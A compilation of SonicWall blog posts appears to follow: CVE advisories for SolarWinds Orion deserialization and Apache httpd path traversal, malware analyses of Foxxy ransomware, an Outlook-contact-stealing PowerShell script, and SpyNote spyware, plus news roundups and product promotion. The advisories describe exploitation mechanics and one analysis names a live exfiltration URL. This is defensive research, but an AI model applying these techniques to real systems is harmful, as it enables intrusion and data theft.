SolarWinds Orion Platform RenderControl.aspx Vulnerability

/in /by

Overview:

  The SolarWinds Orion Platform is the base platform used by numerous SolarWinds products such as Network Performance Monitor, Virtualization Manager, and Server Configuration Monitor. The platform is designed to seamlessly integrate all Orion-based products into a single interface. The core Orion platform utilizes a web-based interface built using ASP.NET and by default is accessible via HTTP on port 8787

  An insecure deserialization vulnerability has been reported in SolarWinds Orion, the core platform for multiple SolarWinds products. The vulnerability is due to insufficient validation of user-supplied JSON data submitted to the RenderControl.aspx endpoint.

  A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in remote code execution under the security context of NETWORK SERVICE.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-35215.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.9 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  Several UI elements in SolarWinds Orion Platform utilize controls to render customized ASP.NET pages. To load the content of these custom controls, the application sends a POST request to the endpoint “/Orion/ RenderControl.aspx”. This endpoint reads the type of the control from the Control parameter and the control’s properties from the config parameter. These parameters can be submitted either via the request-URI query or via a JSON object in the HTTP body of the request. When the endpoint processes the request, it first loads the requested control, then sets each of the control’s properties as set in the config parameter. The control parameters are set by invoking the setter function associated with each property.

  An insecure deserialization vulnerability exists in SolarWinds Orion Platform. The vulnerability is due to a lack of sanitization of parameters sent to the RenderControl.aspx endpoint. This endpoint allows loading an arbitrary control, and setting properties of that control to arbitrary values. Due to the fact there is no check to see if a given control property setter method is safe to be invoked, a malicious control, such as an instance of the SolarWinds.Orion.Web.Actions.ActionPluginBaseView class with a crafted ViewContextJsonString property may be sent by an attacker. This results in invocation of the ParseViewContext() method on the malicious property, which in turn calls the JsonConvert.DeserializeObject() method to deserialize the property as SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext if the EnviromentType property is set to “Alerting”, or as SolarWinds.Orion.Core.Models.Actions.Contexts.ReportingActionContext if the EnviromentType property is set to “Reporting”. Both of these classes inherit from SolarWinds.Orion.Core.Models.Actions.Contexts.ActionContextBase, which can be leveraged to achieve remote code execution using the known gadget chain used in the public exploit for CVE-2021-31474.

  A remote, authenticated attacker can exploit this vulnerability by sending a crafted serialized object to the target server. Successful exploitation can result in arbitrary code execution under the security context of NETWORK SERVICE.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the target server.
  • The attacker must authenticate to the target application.

Triggering Conditions:

  The attacker authenticates to the target application. Next, the attacker sends a crafted HTTP request to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8787/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2168 SolarWinds Orion RenderControl Insecure Deserialization

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch resolving the vulnerability.
    • Upgrading to a version unaffected by the vulnerability.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Foxxy RaaS released. Decryption key and function present in sample

/in /by

The SonicWall Capture Labs threat research team has come across new ransomware known as Foxxy.  This ransomware appeared in late October 2021 and the sample we have obtained appears to be a proof of concept that has been released into the wild from an unknown source.  After further investigation, we discovered that this ransomware is from a suite of services supplied by the operator.  The malware charges 0.9 BTC (around $55k USD at this time) for file recovery.  However, there is no way to communicate with the operators.

 

 

Infection Cycle:

 

The malware uses the following icon:

 

Upon infection, the malware encrypts files on the system and appends “.foxxy” to their filenames.  The following message is shown on the desktop:

 

The following file is added to the system:

  • %USERPROFILE%\Desktop\___RECOVER__FILES__.foxxy.txt

 

___RECOVER__FILES__.foxxy.txt contains the following message:

 

The malware is written in C# for the .NET framework and is easy to decompile.  Decompilation reveals the intent of the malware and shows the encryption key and ransom message:

 

The encryption function and key can be clearly seen in the code.  It uses Rijndael symmetric encryption.  Because the encryption method is symmetric, the key used for encryption can be used for decryption as long as the same “randomSalt” value is used:

 

The malware also includes the decryption function.  Usually, with most ransomware, this is not the case.  Most operators will only supply decryption software after payment:

 

The malware supplies “foxxy.tiiny.site” as an email address for file recovery consultation.  However, this is not an email address.  It is a website that sells foxxy ransomware:

 

In addition to selling foxxy ransomware, the operators sell various other services such as DDoS and password cracking:

 

The “Malware (Raas)” button leads to the following page detailing the features of foxxy ransomware:

 

This site has since been taken offline.

 

There has been some activity at the supplied bitcoin address but it is unclear as to whether or not this is the result of the ransomware itself:

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Foxxy.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

How Unified Cloud Simplifies Network Switch Management.

/0 Comments/in , /by

SonicWall Wireless Network Manager (WNM) unifies and simplifies network switches, access points, and network-wide configuration control.

Network managers are busy and getting busier. Not only do they have record-breaking cyberthreats and new security mandates piling up, but they also have the day-to-day tasks of managing resources, provisioning assets, and monitoring the entire network ecology. Then there are the productivity issues of having to do it all and not get lost in layers of software accounts and user interfaces.

Network switches help control the complexity. Switches are an essential tool for connecting computers, servers, and other network resources. They’re also a primary means of controlling devices and traffic and adjusting a network’s security profile whenever necessary.

Unified cloud management is the natural next step in managing network switches. At a very simple level, unified cloud management facilitates configuration and monitoring thousands of switch ports instantaneously over the web. But, dive deeper, and there is you a panoply of capability and functionality that allow IT teams to work smarter – accomplishing major tasks with just a few simple clicks on a cloud-based interface and without deploying a staff of on-site smart hands to guide processes.

Next Level Network Switch Management

SonicWall Wireless Network Manager (WNM) is the “next level” unified cloud management system. WNM is designed to give IT teams an intuitive tool for one-touch wireless and switching network management capabilities while giving them data-rich analytics and easy onboarding workflows from a single pane of glass. In addition, WNM’s cloud-based infrastructure helps simplify access, control and troubleshooting by unifying multiple tenants, locations and zones.

From one interface, managers provision remote sites, deploy network-wide configuration changes and manage campus and distributed networks. SonicWall WNM significantly reduces dedicated technical training and deploying dedicated staff to smart-touch devices and other resources by working via the cloud.

In addition, cloud-managed switches and access points have additional cloud-based management functionality. For example, they automatically discover wired and wireless devices connected to a network and then draw the topology that enables network administrators to troubleshoot issues remotely quickly.

WNM supports thousands of SonicWave Access points and SonicWall Switches without the cost of complex overlay management systems. With the release of WNM 3.5, administrators can control SonicWall switches and existing SonicWave access points all at once. Onboarding and deployment of SonicWall switches and access points are automatic and networks are up in minutes.

Single-pane-of-glass Network Management

We mentioned WNM’s single-pane-of-glass design. What this means is that WNM provides an intuitive dashboard that not only simplifies control but also unifies visual data. In addition, it comes as an integrated part of the SonicWall Capture Security Center ecosystem, where IT teams can efficiently and effectively manage just about every aspect of networks of any size.

Administrators can drill down to specific managed devices for granular data and status, plus examine a detailed view of network hierarchy right down to single policies created at the tenant level that are pushed down to various locations and zones. In addition, WNM is highly scalable, from a single site to global enterprise networks with tens of thousands of managed devices supporting multiple tenants.

Stable and Reliable Operations

WNM delivers the stability and reliability of the cloud. During an Internet outage, access points and switches can continue to work without WNM, ensuring business continuity. Two-factor authentication and packet encryption heighten security. Automatic firmware and security updates keep managed devices up to date. Selectively apply Production, Beta or Patch firmware on each managed device as needed. Automatically send reports to multiple recipients at the same time.

Zero-Touch Deployment and Advanced Analysis Tools

With WNM and Zero-Touch Deployment, an array of SonicWall switches can be up and running in minutes. Register and onboard the devices from anywhere with the SonicExpress app. Plus, WNM’s topology tool provides network topology maps and managed device statistics for quick visual analysis of every aspect of the network.

Lower Total Cost of Ownership

SonicWall Wireless Network Manager drives down the total cost of ownership by shifting capital expenditures to operating expenses. Wireless Network Manager cuts out the cost and maintenance of redundant hardware-based controllers and optimizes data center rack space. In addition, its intuitive interface reduces training and administrative overhead costs.

Even with a limited staff, and no matter the size of your network, SonicWall Wireless Network Manager offers unified visibility and control in a secure, Wi-Fi cloud-managed solution. To learn more, visit sonicwall.com/wnm.

Cybersecurity News & Trends – 10-29-21

/0 Comments/in /by

News outlets continue quoting the Mid-Year Update to the 2021 SonicWall Cyber Threat Report.  Meanwhile, SonicWall’s The Year of Ransomware report catches attention with third-quarter data: a 148% surge in global ransomware attacks making 2021 the worst year ever recorded. In industry news, hackers launch SEO poisoning, Microsoft launches a cybersecurity job campaign, U.S. cyber teams take down REvil, and Russian hackers hide behind American home Wi-Fi networks.

SonicWall in the News

‘The Year of Ransomware’ Continues with Unprecedented Late-Summer Surge

AIThority: Citing SonicWall’s “The Year of Ransomware” report, there was a 148% surge in global ransomware attacks (495 million) year to date. The third-quarter surge makes 2021 the worst year SonicWall has ever recorded.

The World Is Now Facing a Spate of Coordinated Cyber Attacks

Telecom TV: Ransomware incursions have reached “pandemic levels” while old-fashioned DDoS attacks still pack a punch. Meanwhile, “never-before-seen” malware variants are emerging every day, according to a recent cyber threat report from SonicWall. The author goes on to name SonicWall “the world’s most quoted expert on ransomware.”

Unprecedented and Coordinated Cyber Attacks

National Security News: An “unprecedented” and “coordinated” spate of cyberattacks is hitting many U.K. VoIP services. So says the Comms Council in the U.K. There have been 495 million known ransomware attacks perpetrated so far this year, according to a recent threat report from SonicWall titled “The Year of Ransomware.”

Thwarting Phishing Threats with Simulations

Security Boulevard: Social engineering schemes continue to flourish, making their way into company inboxes with the intent to mislead employees into downloading malicious software. How likely is this to happen to your company? According to SonicWall, there was a record-high 304.7 million ransomware attacks in the first half of 2021. So the short answer is, it’s very likely.

How Safe is the U.K. From Cybercrime?

TechMonitor: The U.K. comes fifth in a new global ranking that combines five cybersecurity and anti-money laundering protections indices. The author notes the growing importance of countering phishing and ransomware attacks, significantly as the latter has increased by 151% in the first half of 2021, from the same period in 2020, according to the mid-year update on SonicWall’s Cyber Threat Report.

The Invisible War

Handelsblatt (Germany): An outstanding article in one of Germany’s most important daily newspapers mentions SonicWall as an expert in cybersecurity and quotes the 2021 Cyber Threat Report Mid-Year Update. The authors cite several vital stats from the report to explain the rise of various threats that have weakened cybersecurity throughout the world. The article appeared online and in the print issue of the publication.

How to Create a Relevant Cybersecurity Strategy

Accounting Web (U.S.): Using SonicWall’s Mid-Year Update on the 2021 Cyber Threat Report, the author illustrates the sharp rise in cybersecurity attacks. The article is mostly about how CPAs and other accounting professionals play a crucial role in protecting financial data. However, the author also provides an overview of the most common cyberattacks, such as malware and phishing, and offers tips on making sure your organization has the proper protections in place.

‘Clumsy’ BlackByte Malware Reuses Crypto Keys, Worms into Networks

Dark Reading (U.S.): A unique malware named “BlackByte” was discovered during a recent incident response engagement. The malware reportedly avoids Russian computers and uses a single symmetric key for encrypting every compromised system. Additionally, the report cites SonicWall’s “Cyber Threat Report: Mid-Year Update” and notes that the number of ransomware attacks in the first half of the year rose 150% to almost 305 million.

Industry News

Ransomware Gangs Use SEO Poisoning to Infect Visitors

Bleeping Computer: SEO poisoning, also known as “search poisoning,” is an attack method that relies on optimizing websites using ‘black hat’ SEO techniques to rank higher in Google search results. Due to their high ranking, victims who land on these sites believe they are legitimate, and actors enjoy a heavy influx of visitors who look for specific keywords. According to this story, two campaigns have surfaced recently. One is linked to Gootloader and the other to the SolarMarker backdoor. Most campaigns deploy SEO poisoning payloads via PDFs that drop the malware into the victim’s device. Additionally, threat actors use redirects to prevent their sites from being removed from search results. Adding to the problem, threat actors also hacked the Formidable Forms plugin found on many WordPress websites.

Microsoft Launches Campaign to Fill 250,000 Cybersecurity Jobs

Axios: Microsoft announced Thursday that it’s launching a national campaign to help fill 250,000 cybersecurity jobs in the U.S. by 2025, including providing a free curriculum to every public community college. The company’s president Brad Smith warned that the current workforce shortage is at crisis levels and threatens to undermine the country’s ability to protect itself against cyber and ransomware attacks.

U.S. to Create Diplomatic Bureau to Lead Cybersecurity Policy

Dark Reading: Plans are underway to revitalize the State Department and make cybersecurity a core priority with the addition of 500 new civil service positions, a 50% increase in its information technology budget, and the creation of the Bureau of Cyberspace and Digital Policy, officials have announced.

Ransomware Hackers Freeze Millions in Aid for Papua New Guinea

Bloomberg: The government’s payment system was locked by attackers last week. Hackers demanded payment from the nation hard hit by Covid-19. While government officials restored the system, they claimed they did not pay a ransom.

Martin County Tax Collector’s Possibly Hit by Ransomware Attack

WPTV News: A possible ransomware attack may have caused a lengthy closure of the Martin County Tax Collector’s offices for nearly two weeks. The Florida county office has been sending residents to a nearby county for help with processing payments. WPTV news investigated the incident when county officials did not explain the lengthy “network problems” they were experiencing.

Avista Warns Customers of Ransomware Attack

KXLY News: Avista, the chief energy provider for the Pacific Northwest, announced that one of its energy efficiency vendors was the target of a ransomware attack earlier this month. The company said it doesn’t believe any of its customers’ sensitive information was compromised. However, the company also noted that hackers got access to customers’ email addresses, utility numbers, service addresses and energy usage.

Feds Take Down Top Ransomware Hacker Group REvil

The Verge: The government has successfully hacked the hacking group REvil, the entity behind the ransomware that’s been linked to leaked Apple leaks, attacks on enterprise software vendors, and more, according to a report from Reuters. The outlet’s sources tell it that the FBI, Secret Service, Cyber Command, and organizations from other countries have worked together to take the group’s operations offline this month. In addition, the group’s dark web blog, which exposed information gleaned from its targets, is also reportedly offline.

Russian Hackers Reportedly Hid Behind Americans’ Home Networks to Mask Their Activities

Gizmodo: In case you missed it, the “SolarWinds” hackers are back. A recent report from Microsoft researchers shows that certain cyber-spies—believed to be members of Russia’s Foreign Intelligence Service—have been targeting droves of American tech firms with a new hacking campaign. According to Microsoft and other sources, Russian military hackers used weaknesses in home WiFi networks to wage hacking campaigns against high-level American targets.

In Case You Missed It

Apache Httpd Traversal Vulnerability

/in /by

Overview:

  The Apache HTTP server is the most popular web server used on the Internet. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in modules can be used to extend its functionality.

  A directory traversal vulnerability exists in Apache httpd. The vulnerability is due to improper normalization of paths in the request URI.

  A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation would result in disclosure of the content of files outside the expected document root, or in the worst case, execution of arbitrary code under the security context of the server process.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-41773.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  When httpd receives an HTTP request, it is handled by the ap_process_async_request() function. The request data is processed by the ap_process_request_internal() function. This function normalizes the path submitted in the request URI by calling the ap_normalize_path() function. This function normalizes the path submitted by decoding URL-encoded characters, collapsing multiple slash (‘/’) characters, and interpreting “../” by traversing to the parent directory in the path.

  After the normalization function, the ap_run_translate_name() function is called, which calls translate_alias_redir(). This function calls try_alias_list(), which looks up any ScriptAlias entries in the httpd server configuration file that match the request URI. If a match is found, apr_filepath_merge() is called, which merges the server root path with the normalized path. The merged path is later saved to the filename field of the request_rec structure. Next, access permissions are checked by calling ap_run_access_checker_ex(), which looks up the appropriate Require entries in the httpd server configuration.

  If access is allowed, the appropriate handler is invoked for processing the request. If the request URI path begins with “/cgi-bin/”, and the mod_cgi module is enabled in the server configuration, the cgi_handler() function is called to handle the request. This function uses the filename field of the request_rec structure to build an OS command and runs the command in a child process. Then, the HTTP POST request data submitted is sent to the created process as input.

  A directory traversal vulnerability exists in Apache httpd. The vulnerability is due to a flaw in the normalization of the path submitted in the URI of HTTP requests. The ap_normalize_path() function attempts to resolve “../” sequences in the path by traversing to the parent directory. However, if the second dot character (‘.’) in a “../” sequence is URL-encoded (i.e. “.%2e/”), the “../” sequence will not be interpreted and the sequence will remain in the normalized path. When this path is later merged with the server root path using the apr_filepath_merge() function, the resulting path saved to the filename field of the request_rec structure could traverse beyond the server root path. If access is granted to the server’s root directory and the mod_cgi module is enabled, an arbitrary executable on the server can be called, leading to arbitrary code execution.

  A remote attacker could exploit this vulnerability by sending a request with a crafted URI to the target service. Successful exploitation could lead to exposure of the contents of arbitrary files on the server. If the mod_cgi module is enabled, exploitation could lead to execution of arbitrary code on the target server.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.
  • Permissions must be granted to the server’s root directory in the httpd.conf configuration file.
  • Arbitrary code on the target server, the mod_cgi module must be enabled in the httpd.conf configuration file.

Triggering Conditions:

  The attacker sends an HTTP request with a maliciously crafted URI path. The vulnerability is triggered when the server attempts to process the HTTP request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 80/TCP
    • HTTPS, over port 443/TCP

  Http Request:

  

  Http Request In Text:

  

  Password File:

  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2140 Web Application Directory Traversal 48

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

PowerShell script that steals email addresses from Outlook

/in /by

SonicWall Threats Research team has observed an obfuscated batch(BAT) file inside an archive which is delivered to the victim’s machine as an email attachment. The BAT file executes a PowerShell script which steals and sends email addresses from Outlook contacts:

 

BATCH SCRIPT:

The batch script contains a PowerShell cmdlet which communicates over HTTPS to execute remote PowerShell script:

 

PowerShell SCRIPT:

The PowerShell script is responsible for stealing and sending Outlook contacts email addresses to the remote machine.

The PowerShell script checks for the presence of file ‘$env:APPDATA\Microsoft\.Outlook’ , to ensure its single execution for a machine. If the file is already present then this script does not execute:

 

The PowerShell script enumerates outlook contacts and retrieves their email addresses to add them in a global list. However the code won’t work as it needed correction in the variable name and a property field as highlighted in the below snippet:

 

 

The stolen email addresses are sent to the remote machine at “https://puwq9m8p.educabrasil.live/gravadados.php?lista=”:

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution:

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Cyber Threat Alert: Ransomware Breaks Another Record

/0 Comments/in /by

As the ‘Year of Ransomware’ roars on, SonicWall observes 3rd Quarter with another unprecedented, record-breaking surge in attacks.

In July 2021, SonicWall released its widely quoted Mid-Year Update to the 2021 SonicWall Cyber Threat Report with alarming news of the sharp rise in ransomware and other malicious attacks. We’re back again with more data and a message: ransomware’s rise has not slowed.

This year was already proving to be the most active year for cyberattacks on record. After posting a groundbreaking 188.9 million ransomware attacks in the second quarter of 2021, SonicWall Capture Labs threat researchers have found that ransomware attacks broke another record of 190.4 million in the third quarter. The total 495.1 million ransomware attacks represent a 148% year-to-date increase over 2020, making 2021 the most costly and dangerous year on record.

A Nearly Unimaginable Upward Trend

The 190.4 million ransomware attacks in the third quarter is the highest ever recorded by SonicWall. Additionally, the statistic nearly eclipses the 195.7 million total ransomware attacks recorded during the first three quarters of 2020.

“As we see it, ransomware is on a nearly unimaginable upward trend, which poses a major risk to businesses, service providers, governments and everyday citizens,” SonicWall President and CEO Bill Conner said in the official release.

Despite movements to secure cyber infrastructures from respective national governments, the U.K. has seen a 233% surge in the number of ransomware attacks, and the U.S. has witnessed a 127% year-to-date increase.

Cyberattacks: A Severe Global Crisis

The sheer volume of attacks illicit words like “global crisis,” “ruthless,” and “a significant national security threat.” Yet, many people appear to be determined to restore a sense of normalcy while this severe global crisis roils on.

“Cybercriminals have never let up, driving ransomware campaigns to record numbers through the first three quarters of 2021,” said Conner. “These criminal organizations will continue to launch highly sophisticated cyberattacks that are designed to target organizations and business with weak or lax security controls.”

A summary of SonicWall Q3 2021 findings:

  • 148% surge in global ransomware attacks in 2021, the worst year SonicWall has ever recorded
  • 714 million ransomware attacks predicted by the close of 2021
  • 1,748 ransomware attempts per customer through the third quarter
  • 33% rise in IoT malware globally; upticks in North America and Europe
  • 21% increase in cryptojacking with massive 461% growth across Europe

Another Growing Concern: Increases in Unique Malware Variants

Amid the stats, there is another reason for concern: SonicWall Real-Time Deep Memory InspectionTM discovered 307,516 never-before-seen malware variants during the first three quarters of 2021 — a 73% year-to-date increase. That’s an average of 1,126 new malware variants discovered each day in 2021.

The rise in variants points to maturation in cybercriminals ability to rapidly diversify the tactics they use to attack organizations, their networks and their users. Coupled with a constant flood of cyberattacks, businesses and individuals will find it increasingly difficult to protect themselves with old or expired cybersecurity technology.

Patented RTDMI™ technology is part of the cloud-based Capture Advanced Threat Protection (ATP) sandbox service. Among several patented innovations, RTDMI leverages memory inspection and CPU instruction-tracking with machine-learning capabilities. As a result, the system efficiently recognizes and mitigates cyberattacks, including threats that do not initially show malicious behavior.

The Grace Period Has Come to an End

All told, SonicWall logged 1,748 ransomware attempts per customer through the third quarter. From another perspective, this is the equivalent of 9.7 ransomware attempts per customer per business day. With the increased ability to diversify their means of attack, criminals have a growth business on their hands.

“The real-world damage caused by these attacks is beyond anecdotal at this point. It’s a serious national and global problem that has already taken a toll on businesses and governments everywhere,” said Conner.

With a predicted 714 million ransomware attacks by the end of the year, the grace period for companies and individuals to increase their protections and change their behavior has come to an abrupt end.

“The techniques deployed by ransomware actors have evolved well beyond the smash-and-grab attacks from just a few years ago,” said SonicWall Vice President of Platform Architecture Dmitriy Ayrapetov. “Today’s cybercriminals demonstrate deliberate reconnaissance, planning and execution to surgically deploy toolchains targeting enterprise and government infrastructure. This results in larger victims and leads to higher ransoms.”

Squid Game themed Android malware hides SpyNote spyware

/in /by

The series Squid Game has been a global phenomenon in the last few weeks and malware writers are using this popularity as a means to spread their malicious creations. We have started seeing numerous malicious Android apps use the name and icons of Squid Game. One of the highlights was SpyNote that has been masquerading as popular Android apps.

We have reported previously about the android spyware SpyNote that masquerades itself as popular applications. It uses the popularity of these apps to spread the infection and in this case its using the popularity of Squid Game to do the same.

 

  • Application Name: Squid Game Fake Call 1
  • Package Name: cmf0.c3b5bm90zq.patch
  • MD5: 785a9475c1088a798512ca6ab6d8b0f1

The app requests for a large number of suspicious permissions for a application that does ‘Fake Call’:

 

SpyNote requests for accessibility services and device admin privileges once installed and executed:

Spynote can install a legitimate apk present in the resources – res/raw/google.apk. It uses this to list a legitimate accessibility services entry when executed.

 

Upon execution the icon disappears from the app drawer but in the background the malware starts performing malicious actions. Few functionalities are listed below:

  • The app checks the applications installed on the device:

 

  • It uses hardcoded server address and port number and later communicates using sockets:

 

  • We identified multiple malicious apk’s that are linked to this campaign as they communicate with the same server, below VirusTotal graph highlights this:

 

  • It captures details about the device which can be used by the perpetrators to identify the victim and gather additional details. Following was identified:
    • Device manufacturer
    • Device model
    • OS version
    • SIM
    • Wifi
    • Bluetooth
    • Location

 

  • It has access to call logs and can make calls from the infected device:

 

SpyNote has been known to masquerade as popular Android apps. It is good at selecting trending topics and modifying the malware look and feel to mimic on such topics. We anticipate more malware writers to follow this trend and use the popularity of Squid Game to spread malware.

 

Sonicwall Capture Labs provides protection against multiple threats associated with this campaign using the signatures listed below:

  • AndroidOS.SpyNote.GN
  • AndroidOS.SpyNote.PT
  • AndroidOS.SpyNote.SP
  • AndroidOS.SpyNote.SC

Why Cybersecurity Must be First

/0 Comments/in /by

If you think that cybersecurity is something that only people who manage data centers need to worry about, you’d better think again.

The reasons why cybersecurity first should resonate with everyone is all over the news. Ransomware attacks rose to 304.6 million during the first six months in 2020, up 62% over 2019, according to our own widely quoted Mid-Year Update on the 2021 SonicWall Cyber Threat Report.

And ransomware volume continues to break records. Through the first three quarters of 2021, SonicWall Capture Labs recorded another historical 148% spike for the year-to-date. Through September 2021, we’ve seen more than 495 million ransomware attempts globally.

Again, much of this rise is credited to the highly distributed workforces caused by the pandemic. However, these stats point to an underlying weakness in cybersecurity, and it’s all about OUR behavior.

Skipping Security, Raising Risk

Working from home blurs the lines between personal space and corporate security. A recent story in CPO Magazine revealed that a shocking 30% of remote workers who consider themselves IT professionals say that they circumvent or ignore corporate security policies when they get in the way of getting work done.

Another surprise: 91% of survey participants agreed that they felt pressure to compromise security for productivity, with 76% saying that sometimes security had to take a backseat to business needs. But then, 83% of the respondents admitted that these attitudes had created a “ticking time bomb” for a breach. And these are people who should know the risks very well.

Why does it matter?

Times have changed. The criminals are out there in droves. They are motivated by profit, and they want your data and, ideally, your money too. Unfortunately, our primary means of communication – text, email, instant messaging – make everyone accessible targets. Those of us who don’t know the basics of security, or worse yet, ignore security measures, are the ones who are putting everyone else at risk.

Bottom line, if you’re not making security a priority today, a hacker will come along – eventually – and help change your mind. The new generation of hackers are bold, and they know that people are the weakest link and they’re ready to attack.

Cybersecurity is everyone’s business.

There’s an expectation in polite society for people to think about good manners and hygiene. This is because such rules make it easier for everyone to feel comfortable in social situations. So when we follow social hygiene rules – like washing hands and covering our mouths when we cough or sneeze – we convey expectations on social quality.

Odd then that we don’t think about good manners and hygiene when it comes to using computers and our digital devices. Think about people who do things like let their antivirus software expire or insist on using old tech that we know is hackable. What about folks who cavalierly use passwords like ‘12345678’? What do these behaviors say to everyone who is in our sphere of communication?

Stop thinking about technology and hackers for a moment and look at this as a holistic problem. If the survey about IT professionals is remotely accurate, and if the threats are as real as the data says, it means our attitude toward security needs serious adjustment.

Establish a #CybersecurityFirst Mindset

How do we get to a level of care that avoids security risks? We start by making sure that everyone is aware and able to make themselves more resilient to hacking. It sounds complex but comes down to knowing the difference between what’s considered poor and good behavior.

For instance, poor behavior may cause people to assume that computers and digital devices are safe and that nobody cares about the single user plugging away at an accounting spreadsheet in a coffee shop. Good behavior takes personal responsibility and recognizes that being online has definite and inherent risks. Some risks are far more severe than others, but above all poor behavior (like denying there’s a risk) raises not only your chances of getting hacked but also raises risks for everyone who connects with you.

Prevention is a Full-Time Job

Even experts who take the best precautions can’t always prevent hacks and virus infections. So, along with accepting personal responsibility, we make it harder for hackers by creating layers of security:

  • Use and maintain antivirus software and a firewall. Contrary to some myths, people who use PCs, Macs, phones and pads are equally exposed and should have active antivirus programs, firewalls, malware sniffers, and VPN. Install patches (automatic updates) and keep your firewalls up-to-date. Hackers scan for people with old or expired software. And, if you don’t have either, you’re just a sitting duck.
  • Establish your own personal online usage guidelines. You can start with the rules and guidelines from your company. The rules are usually simple enough. Many are simple common sense: don’t share passwords, use good passwords, think before clicking (any link) and always be cautious about installing unknown or untested software and IoT devices.
  • Double-check email attachments. When it comes to phishing and ransomware, you can never be sure about an unexpected text message, email, or phone call. Hackers are very clever and adept at making email look like it comes from someone you know or a company you trust. Before opening attachments or clicking links, verify the identity of the sender.
  • Trust your instincts. Attackers are constantly releasing new viruses. So, scan documents and attachments with antivirus software before opening them. If an email or text message looks suspicious, delete it. Suppose it’s really important, someone will try to contact you again. Always remember technology can only help so much, so trust your instincts!

Be Cyber-Resilient

The entire Cybersecurity Awareness Campaign create by the CISA is intended to raise our awareness about the risks WE ALL FACE. For example, when we share #CybersecurityFirst we encourage everyone around us to be more watchful and vigilant about our security. But the effort goes far beyond hashtags and slogans.

When we educate ourselves and help stakeholders, we’re taking a firm stand about where we are in the long-term journey to safety. Read SonicWall’s Ultimate Enterprise Ransomware Guide and see where we are in developing systems that are secure and resilient to ransomware and other threats.

But remember, there’s no quick fix, no “set-and-forget” software, no universal rules for cyber-resilience. Good cybersecurity technology like virtual firewall platforms, physical firewalls, and other security services help, but good behavior is where the real work begins.

Cybersecurity News & Trends – 10-22-21

/0 Comments/in /by

The news outlets are back to quoting the Mid-Year Update to the 2021 SonicWall Cyber Threat Report, with a big hit in Germany in Handelsblatt, a major news outlet. In industry news, analysts debate the significance of “killware,” hackers are stealing telecom records, hosting admins sentenced with RICO charges, Dark Web goes darker, Macs are still safer, and beware of YouTube trojans.

SonicWall in the News

The invisible war – how global hacker gangs threaten our security and prosperity

Handelsblatt (Germany): An outstanding article in one of Germany’s most important daily newspapers mentions SonicWall as an expert in cybersecurity and quotes the 2021 Cyber Threat Report Mid-Year Update. The authors cite several vital stats from the report to explain the rise of various threats that have weakened cybersecurity throughout the world. The article appeared online and in the print issue of the publication.

SonicWall’ Returns Choice’ To Customers by Securing Different Network Environments

Security Brief (Asia): SonicWall has declared that organizations should no longer change how they operate to secure their networks, devices and people, prompting the company to bring ‘customer choice’ back into its range of cybersecurity solutions.

Protect any network combination

LANline (Germany): This article picked up SonicWall’s media alert on protecting virtual, hybrid, cloud-based and local systems with SonicWall.

SonicWall Webinar: Can small companies and branches survive the crisis?

Infopoint Security (Germany): This article promotes a SonicWall webinar that shows how small businesses can best protect themselves during the “crisis” of increased cyberattacks.

Could your company recover from a ransomware attack?

BizJournals (U.S.): Citing SonicWall’s mid-year update on the 2021 Cyber Threat Report, the author notes the sharp rise in ransomware attacks in North America as a reason for companies to create contingency plans.

How to Create a Relevant Cybersecurity Strategy

